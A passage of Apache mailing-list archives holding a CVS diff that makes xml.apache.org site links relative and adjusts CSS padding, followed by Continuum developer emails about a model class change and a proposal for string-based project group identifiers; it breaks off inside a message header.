href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.46 +13 -13 xml-site/targets/roles.html Index: roles.html =================================================================== RCS file: /home/cvs/xml-site/targets/roles.html,v retrieving revision 1.45 retrieving revision 1.46 diff -u -r1.45 -r1.46 --- roles.html 26 Aug 2004 20:31:57 -0000 1.45 +++ roles.html 31 Aug 2004 03:35:25 -0000 1.46 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.46 +13 -13 xml-site/targets/source.html Index: source.html =================================================================== RCS file: /home/cvs/xml-site/targets/source.html,v retrieving revision 1.45 retrieving revision 1.46 diff -u -r1.45 -r1.46 --- source.html 26 Aug 2004 20:31:57 -0000 1.45 +++ source.html 31 Aug 2004 03:35:25 -0000 1.46 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.54 +13 -13 xml-site/targets/whoweare.html Index: whoweare.html =================================================================== RCS file: /home/cvs/xml-site/targets/whoweare.html,v retrieving revision 1.53 retrieving revision 1.54 diff -u -r1.53 -r1.54 --- whoweare.html 26 Aug 2004 20:31:58 -0000 1.53 +++ whoweare.html 31 Aug 2004 03:35:25 -0000 1.54 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.11 +3 -2 xml-site/targets/skin/page.css Index: page.css =================================================================== RCS file: /home/cvs/xml-site/targets/skin/page.css,v retrieving revision 1.10 retrieving revision 1.11 diff -u -r1.10 -r1.11 --- page.css 26 Aug 2004 20:31:59 -0000 1.10 +++ page.css 31 Aug 2004 03:35:26 -0000 1.11 @@ -45,12 +45,13 @@ .note { border: solid 1px #7099C5; background-color: #f0f0ff; } .note .label { background-color: #7099C5; color: #ffffff; } +.note .label { background-color: #7099C5; color: #ffffff; padding: 5px 5px 5px 10px; } .warning { border: solid 1px #D00000; background-color: #fff0f0; } -.warning .label { background-color: #D00000; color: #ffffff; } +.warning .label { background-color: #D00000; color: #ffffff; padding: 5px 5px 5px 10px; } .fixme { border: solid 1px #C6C600; background-color: #FAF9C3; } -.fixme .label { background-color: #C6C600; color: #ffffff; } +.fixme .label { background-color: #C6C600; color: #ffffff; padding: 5px 5px 5px 10px; } .code { border-color: #CFDCED; border-style: solid; border-width: 1px; } .codefrag { font-family: "Courier New", Courier, monospace; } --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Wed Nov 01 22:00:02 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91752 invoked from network); 1 Nov 2006 22:00:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Nov 2006 22:00:02 -0000 Received: (qmail 59577 invoked by uid 500); 1 Nov 2006 22:00:13 -0000 Delivered-To: [email protected] Received: (qmail 59553 invoked by uid 500); 1 Nov 2006 22:00:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59532 invoked by uid 99); 1 Nov 2006 22:00:12 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Nov 2006 14:00:12 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 01 Nov 2006 13:59:59 -0800 Received: (qmail 16527 invoked from network); 1 Nov 2006 21:59:38 -0000 Received: from unknown (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 1 Nov 2006 21:59:38 -0000 Message-ID: <[email protected]> Date: Wed, 01 Nov 2006 22:59:26 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20060909) MIME-Version: 1.0 To: [email protected] Subject: Re: svn commit: r470106 - in /maven/continuum/trunk/continuum-model/src/main: java/ mdo/continuum.xml References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org A database table will be created for this class. Emmanuel [email protected] a écrit : > Author: jmcconnell > Date: Wed Nov 1 13:29:24 2006 > New Revision: 470106 > > URL: http://svn.apache.org/viewvc?view=rev&rev=470106 > Log: > remove the java file from the model project and generate via modello like all the others > > Removed: > maven/continuum/trunk/continuum-model/src/main/java/ > Modified: > maven/continuum/trunk/continuum-model/src/main/mdo/continuum.xml > > Modified: maven/continuum/trunk/continuum-model/src/main/mdo/continuum.xml > URL: http://svn.apache.org/viewvc/maven/continuum/trunk/continuum-model/src/main/mdo/continuum.xml?view=diff&rev=470106&r1=470105&r2=470106 > ============================================================================== > --- maven/continuum/trunk/continuum-model/src/main/mdo/continuum.xml (original) > +++ maven/continuum/trunk/continuum-model/src/main/mdo/continuum.xml Wed Nov 1 13:29:24 2006 > @@ -1181,5 +1181,69 @@ > </field> > </fields> > </class> > + > + <class> > + <name>ContinuumProjectState</name> > + <packageName>org.apache.maven.continuum.project</packageName> > + <version>1.0.0+</version> > + <fields> > + <field> > + <name>name</name> > + <version>1.0.0+</version> > + <type>String</type> > + </field> > + </fields> > + <codeSegments> > + <codeSegment> > + <version>1.0.0+</version> > + <code><![CDATA[ > + public final static int NEW = 1; > + public final static int OK = 2; > + public final static int FAILED = 3; > + public final static int ERROR = 4; > + public final static int BUILDING = 6; > + public final static int CHECKING_OUT = 7; > + public final static int UPDATING = 8; > + public final static int WARNING = 9; > + public final static int CHECKEDOUT = 10; > + > + // TODO: maybe move these to another class > + public static final int TRIGGER_FORCED = 1; > + > + // TODO: remove > + public static final int TRIGGER_SCHEDULED = 0; > + > + public static final int TRIGGER_UNKNOWN = TRIGGER_SCHEDULED; > + > + public String getI18nKey() > + { > + return "org.apache.maven.continuum.project.state." + name; > + } > + > + public boolean equals( Object object ) > + { > + if ( !( object instanceof ContinuumProjectState ) ) > + { > + return false; > + } > + > + ContinuumProjectState other = (ContinuumProjectState) object; > + > + return name.equals( other.name ); > + } > + > + public int hashCode() > + { > + return name.hashCode(); > + } > + > + public String toString() > + { > + return name; > + } > + ]]></code> > + </codeSegment> > + </codeSegments> > + </class> > </classes> > </model> > > > > > From [email protected] Wed Nov 01 22:10:33 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95236 invoked from network); 1 Nov 2006 22:10:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Nov 2006 22:10:32 -0000 Received: (qmail 80660 invoked by uid 500); 1 Nov 2006 22:10:43 -0000 Delivered-To: [email protected] Received: (qmail 80637 invoked by uid 500); 1 Nov 2006 22:10:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 80626 invoked by uid 99); 1 Nov 2006 22:10:42 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Nov 2006 14:10:42 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Nov 2006 14:10:30 -0800 Received: by nf-out-0910.google.com with SMTP id l23so792906nfc for <[email protected]>; Wed, 01 Nov 2006 14:10:09 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=Da7BOt/cyXYWxPb35cuJ9DVLnj1lgFiGo5gSqQWJUlcv/edBIbLVga6F8qNePL0asCiLnOQe90hnH6TKyXpsm+lwGT5pkuacJ9foemhRFxwqlheFuxr77NsM3QwEHIDzMAMlDNCfmnl3jSF5dp4criTJPCUryXSyPU6re/vLkDg= Received: by 161.129.204.104 with SMTP id z16mr1687166bud; Wed, 01 Nov 2006 14:10:08 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 1 Nov 2006 14:10:08 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 1 Nov 2006 16:10:08 -0600 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: Re: svn commit: r470106 - in /maven/continuum/trunk/continuum-model/src/main: java/ mdo/continuum.xml In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: base64 Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org aG0sIGdvb2QgcG9pbnQKCkknbGwgbG9vayBmb3IgdGhlIG9wdGlvbiB0aGF0IHR1cm5zIHRoYXQg b2ZmIGluIHRoZSBqZG8gc3R1ZmYKCmplc3NlCgpPbiAxMS8xLzA2LCBFbW1hbnVlbCBWZW5pc3Nl IDxlbW1hbnVlbEB2ZW5pc3NlLm5ldD4gd3JvdGU6Cj4gQSBkYXRhYmFzZSB0YWJsZSB3aWxsIGJl IGNyZWF0ZWQgZm9yIHRoaXMgY2xhc3MuCj4KPiBFbW1hbnVlbAo+Cj4gam1jY29ubmVsbEBhcGFj aGUub3JnIGEgw6ljcml0IDoKPiA+IEF1dGhvcjogam1jY29ubmVsbAo+ID4gRGF0ZTogV2VkIE5v diAgMSAxMzoyOToyNCAyMDA2Cj4gPiBOZXcgUmV2aXNpb246IDQ3MDEwNgo+ID4KPiA+IFVSTDog aHR0cDovL3N2bi5hcGFjaGUub3JnL3ZpZXd2Yz92aWV3PXJldiZyZXY9NDcwMTA2Cj4gPiBMb2c6 Cj4gPiByZW1vdmUgdGhlIGphdmEgZmlsZSBmcm9tIHRoZSBtb2RlbCBwcm9qZWN0IGFuZCBnZW5l cmF0ZSB2aWEgbW9kZWxsbyBsaWtlIGFsbCB0aGUgb3RoZXJzCj4gPgo+ID4gUmVtb3ZlZDoKPiA+ ICAgICBtYXZlbi9jb250aW51dW0vdHJ1bmsvY29udGludXVtLW1vZGVsL3NyYy9tYWluL2phdmEv Cj4gPiBNb2RpZmllZDoKPiA+ICAgICBtYXZlbi9jb250aW51dW0vdHJ1bmsvY29udGludXVtLW1v ZGVsL3NyYy9tYWluL21kby9jb250aW51dW0ueG1sCj4gPgo+ID4gTW9kaWZpZWQ6IG1hdmVuL2Nv bnRpbnV1bS90cnVuay9jb250aW51dW0tbW9kZWwvc3JjL21haW4vbWRvL2NvbnRpbnV1bS54bWwK PiA+IFVSTDogaHR0cDovL3N2bi5hcGFjaGUub3JnL3ZpZXd2Yy9tYXZlbi9jb250aW51dW0vdHJ1 bmsvY29udGludXVtLW1vZGVsL3NyYy9tYWluL21kby9jb250aW51dW0ueG1sP3ZpZXc9ZGlmZiZy ZXY9NDcwMTA2JnIxPTQ3MDEwNSZyMj00NzAxMDYKPiA+ID09PT09PT09PT09PT09PT09PT09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQo+ ID4gLS0tIG1hdmVuL2NvbnRpbnV1bS90cnVuay9jb250aW51dW0tbW9kZWwvc3JjL21haW4vbWRv L2NvbnRpbnV1bS54bWwgKG9yaWdpbmFsKQo+ID4gKysrIG1hdmVuL2NvbnRpbnV1bS90cnVuay9j b250aW51dW0tbW9kZWwvc3JjL21haW4vbWRvL2NvbnRpbnV1bS54bWwgV2VkIE5vdiAgMSAxMzoy OToyNCAyMDA2Cj4gPiBAQCAtMTE4MSw1ICsxMTgxLDY5IEBACj4gPiAgICAgICAgICA8L2ZpZWxk Pgo+ID4gICAgICAgIDwvZmllbGRzPgo+ID4gICAgICA8L2NsYXNzPgo+ID4gKwo+ID4gKyAgICA8 Y2xhc3M+Cj4gPiArICAgICAgPG5hbWU+Q29udGludXVtUHJvamVjdFN0YXRlPC9uYW1lPgo+ID4g KyAgICAgIDxwYWNrYWdlTmFtZT5vcmcuYXBhY2hlLm1hdmVuLmNvbnRpbnV1bS5wcm9qZWN0PC9w YWNrYWdlTmFtZT4KPiA+ICsgICAgICA8dmVyc2lvbj4xLjAuMCs8L3ZlcnNpb24+Cj4gPiArICAg ICAgPGZpZWxkcz4KPiA+ICsgICAgICAgIDxmaWVsZD4KPiA+ICsgICAgICAgICAgPG5hbWU+bmFt ZTwvbmFtZT4KPiA+ICsgICAgICAgICAgPHZlcnNpb24+MS4wLjArPC92ZXJzaW9uPgo+ID4gKyAg ICAgICAgICA8dHlwZT5TdHJpbmc8L3R5cGU+Cj4gPiArICAgICAgICA8L2ZpZWxkPgo+ID4gKyAg ICAgIDwvZmllbGRzPgo+ID4gKyAgICAgIDxjb2RlU2VnbWVudHM+Cj4gPiArICAgICAgICA8Y29k ZVNlZ21lbnQ+Cj4gPiArICAgICAgICAgICA8dmVyc2lvbj4xLjAuMCs8L3ZlcnNpb24+Cj4gPiAr ICAgICAgICAgICA8Y29kZT48IVtDREFUQVsKPiA+ICsgICAgcHVibGljIGZpbmFsIHN0YXRpYyBp bnQgTkVXID0gMTsKPiA+ICsgICAgcHVibGljIGZpbmFsIHN0YXRpYyBpbnQgT0sgPSAyOwo+ID4g KyAgICBwdWJsaWMgZmluYWwgc3RhdGljIGludCBGQUlMRUQgPSAzOwo+ID4gKyAgICBwdWJsaWMg ZmluYWwgc3RhdGljIGludCBFUlJPUiA9IDQ7Cj4gPiArICAgIHB1YmxpYyBmaW5hbCBzdGF0aWMg aW50IEJVSUxESU5HID0gNjsKPiA+ICsgICAgcHVibGljIGZpbmFsIHN0YXRpYyBpbnQgQ0hFQ0tJ TkdfT1VUID0gNzsKPiA+ICsgICAgcHVibGljIGZpbmFsIHN0YXRpYyBpbnQgVVBEQVRJTkcgPSA4 Owo+ID4gKyAgICBwdWJsaWMgZmluYWwgc3RhdGljIGludCBXQVJOSU5HID0gOTsKPiA+ICsgICAg cHVibGljIGZpbmFsIHN0YXRpYyBpbnQgQ0hFQ0tFRE9VVCA9IDEwOwo+ID4gKwo+ID4gKyAgICAv LyBUT0RPOiBtYXliZSBtb3ZlIHRoZXNlIHRvIGFub3RoZXIgY2xhc3MKPiA+ICsgICAgcHVibGlj IHN0YXRpYyBmaW5hbCBpbnQgVFJJR0dFUl9GT1JDRUQgPSAxOwo+ID4gKwo+ID4gKyAgICAvLyBU T0RPOiByZW1vdmUKPiA+ICsgICAgcHVibGljIHN0YXRpYyBmaW5hbCBpbnQgVFJJR0dFUl9TQ0hF RFVMRUQgPSAwOwo+ID4gKwo+ID4gKyAgICBwdWJsaWMgc3RhdGljIGZpbmFsIGludCBUUklHR0VS X1VOS05PV04gPSBUUklHR0VSX1NDSEVEVUxFRDsKPiA+ICsKPiA+ICsgICAgcHVibGljIFN0cmlu ZyBnZXRJMThuS2V5KCkKPiA+ICsgICAgewo+ID4gKyAgICAgICAgcmV0dXJuICJvcmcuYXBhY2hl Lm1hdmVuLmNvbnRpbnV1bS5wcm9qZWN0LnN0YXRlLiIgKyBuYW1lOwo+ID4gKyAgICB9Cj4gPiAr Cj4gPiArICAgIHB1YmxpYyBib29sZWFuIGVxdWFscyggT2JqZWN0IG9iamVjdCApCj4gPiArICAg IHsKPiA+ICsgICAgICAgIGlmICggISggb2JqZWN0IGluc3RhbmNlb2YgQ29udGludXVtUHJvamVj dFN0YXRlICkgKQo+ID4gKyAgICAgICAgewo+ID4gKyAgICAgICAgICAgIHJldHVybiBmYWxzZTsK PiA+ICsgICAgICAgIH0KPiA+ICsKPiA+ICsgICAgICAgIENvbnRpbnV1bVByb2plY3RTdGF0ZSBv dGhlciA9IChDb250aW51dW1Qcm9qZWN0U3RhdGUpIG9iamVjdDsKPiA+ICsKPiA+ICsgICAgICAg IHJldHVybiBuYW1lLmVxdWFscyggb3RoZXIubmFtZSApOwo+ID4gKyAgICB9Cj4gPiArCj4gPiAr ICAgIHB1YmxpYyBpbnQgaGFzaENvZGUoKQo+ID4gKyAgICB7Cj4gPiArICAgICAgICByZXR1cm4g bmFtZS5oYXNoQ29kZSgpOwo+ID4gKyAgICB9Cj4gPiArCj4gPiArICAgIHB1YmxpYyBTdHJpbmcg dG9TdHJpbmcoKQo+ID4gKyAgICB7Cj4gPiArICAgICAgICByZXR1cm4gbmFtZTsKPiA+ICsgICAg fQo+ID4gKyAgICAgICAgICAgXV0+PC9jb2RlPgo+ID4gKyAgICAgICAgPC9jb2RlU2VnbWVudD4K PiA+ICsgICAgICA8L2NvZGVTZWdtZW50cz4KPiA+ICsgICAgPC9jbGFzcz4KPiA+ICAgIDwvY2xh c3Nlcz4KPiA+ICA8L21vZGVsPgo+ID4KPiA+Cj4gPgo+ID4KPiA+Cj4KPgoKCi0tIApqZXNzZSBt Y2Nvbm5lbGwKamVzc2UubWNjb25uZWxsQGdtYWlsLmNvbQo= From [email protected] Sat Nov 04 16:24:55 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84859 invoked from network); 4 Nov 2006 16:24:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Nov 2006 16:24:54 -0000 Received: (qmail 56868 invoked by uid 500); 4 Nov 2006 16:25:05 -0000 Delivered-To: [email protected] Received: (qmail 56849 invoked by uid 500); 4 Nov 2006 16:25:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 56837 invoked by uid 99); 4 Nov 2006 16:25:05 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Nov 2006 08:25:05 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Nov 2006 08:24:52 -0800 Received: by nf-out-0910.google.com with SMTP id h2so1818540nfe for <[email protected]>; Sat, 04 Nov 2006 08:24:30 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=MXGh64RRSmlIws+w2DTURMQoFvHIiVkHYL4lUnvAM8xkdul9iCeI/Agq2TVYwQI4VJolINggzCFK4Ji3B06EI1GpjK+7Ll+aQN7Egi2qQ1BUaCxX7cloyBOIi56lQA4wC9wdDsJZKA/nUS0f6k0742ZoQTRpDmdSnjhCL4yXHBI= Received: by 161.129.204.104 with SMTP id v13mr1011280bub.1162657468752; Sat, 04 Nov 2006 08:24:28 -0800 (PST) Received: by 161.129.204.104 with HTTP; Sat, 4 Nov 2006 08:24:27 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 4 Nov 2006 10:24:28 -0600 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: Re: project group shortcuts In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Ok, I am going to try this out I think, here is a laundry list of what would happen followed by the benefits. * the id on project group and project classes usage is deprecated and goes back to being internal to the store, nothing references to a project or a group by 0,1,2,3 etc anymore. * groupId on the project group class becomes the unique string by which you access a project group, it is currently kinda floating around usage wise as sometimes the groupId from the pom loaded up on m2 projects * projectId is added to Project and is the unique string by which you refer to a project in a project group * groupId and projectId would be restricted to [a-zA-Z0-9.-] with no spaces and are the short names to refer to these group and project objects on the UI layer and everywhere else in continuum * cascading effects throughout a large chunk of continuum as the integer projectId and the freeform strings for projectGroupName and integer projectGroupId are deprecated and converted to the short names. benefits: * UI layer will standardize on how to refer to project groups and projects in those groups, without passing around internal jdo store identifiers, free form text strings or even the combination of both of those in some cases (this is a failing of mine from the project group refactor I did, it made the UI work clunkier in referring to these things) * by treating m1/ant/shell/m2 projects the same in the UI it should alleviate a ton of oddball UI issues that are cropping up where groups are created, not created, not referred to correctly, names not being passed around between linked actions, etc * following a convention for naming your groups and projects across instances of continuum will make clustering a lot easier, group 7 on this instance isn't necessarily group 7 in that instance * specifying the string group Id that you will refer to that group by on the adding of the project will allow you to load up multiple instances of the same project (ex one instance on trunk and one on a branch) into the same instance of continuum (versions in the poms for m2 should lets these play together nicely), right now I think the projects from that second addition will just add into the same project group unless you rename the name in the pom you are loading * the unique string project Id can be the same for the same project across multiple usages of that project in different groups, letting you refer to them as [Doxia/DoxiaCore] and [Doxia1.2/DoxiaCore] * m1/shell/m2/ant project groups are referred to in the exact same way, and get their values from the same source, on the adding of the group and underlying projects * we can have a GroupNamingMapper and ProjectNamingMapper interface that can be configurable to be used in the automatic generation of the string groupId and projectId so this naming process can be automated by following a convention in the naming of the poms for m2 * the groupId and projectId string values can be edited at any time, letting the user load up the Doxia group and then later change it to the DoxiaTrunk group and then add in a DoxiaBranchFoo group I am sure there are other benefits, but these are the ones that keep pointing me in this direction. I just think that we really need to take a step like this to clean up a lot of messy interactions between the UI layer and continuum core and the confusing mishmash of webwork action linkages involving groups and projects. anyone have any thoughts on this? I am pretty sure I can have this all done in a couple of days of work and I really think it will help maintenance and future development. jesse On 10/30/06, Jesse McConnell <[email protected]> wrote: > > last week I mentioned this in rahul's zero-conf mail > > > if this is really what we want to change here then perhaps we ought to > > make it an option for configuration of the project group in all cases, > > the ability to specify the name of the project group...or give it some > > kinda short identification element. I kinda like that idea, then we > > can use 'Doxia' for 'The Doxia Project' and we can even use the short > > user input project group Id in the urls... > > > > to do this I would put a textfield on the project group creation screens and > then an edittable one in the project config screens, and add it to the > model. This shortcut would replace the locations where the projectGroupName > is currently being passed around on actions to let projects know what group > is being interacted with. Api changes obviously to support this as well, > but I don't think this would be too terribly bad to get into place. We get > to avoid passing around the jdo projectGroupId values which might get screwy > with clustering if we have different stores and the project groups are not > in sync. > > We would also be able to do some mapping to allow for direct url friendly > linking to the summary pages > > http://ci.goo.org:9090/Doxia which would go to the groupSummary page for the > Doxia project. > > Does anyone have any objections to adding this functionality? It would > clean up the interactions for the webwork actions dealing with project names > (having "The Doxia Project" passed around on the url's is kinda chintz) not > to mention allow the m1/m2/ant/shell project groups have a consistent way to > referring to the project group concept. I can see a lot of bonuses and no > downsides right now...I think it will clean up a lot of different > interactions. > > jesse > > -- > jesse mcconnell > [email protected] > -- jesse mcconnell [email protected] From [email protected] Sat Nov 04 16:38:25 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86261 invoked from network); 4 Nov 2006 16:38:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Nov 2006 16:38:24 -0000 Received: (qmail 65177 invoked by uid 500); 4 Nov 2006 16:38:35 -0000 Delivered-To: [email protected] Received: (qmail 65042 invoked by uid 500); 4 Nov 2006 16:38:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65031 invoked by uid 99); 4 Nov 2006 16:38:35 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Nov 2006 08:38:35 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 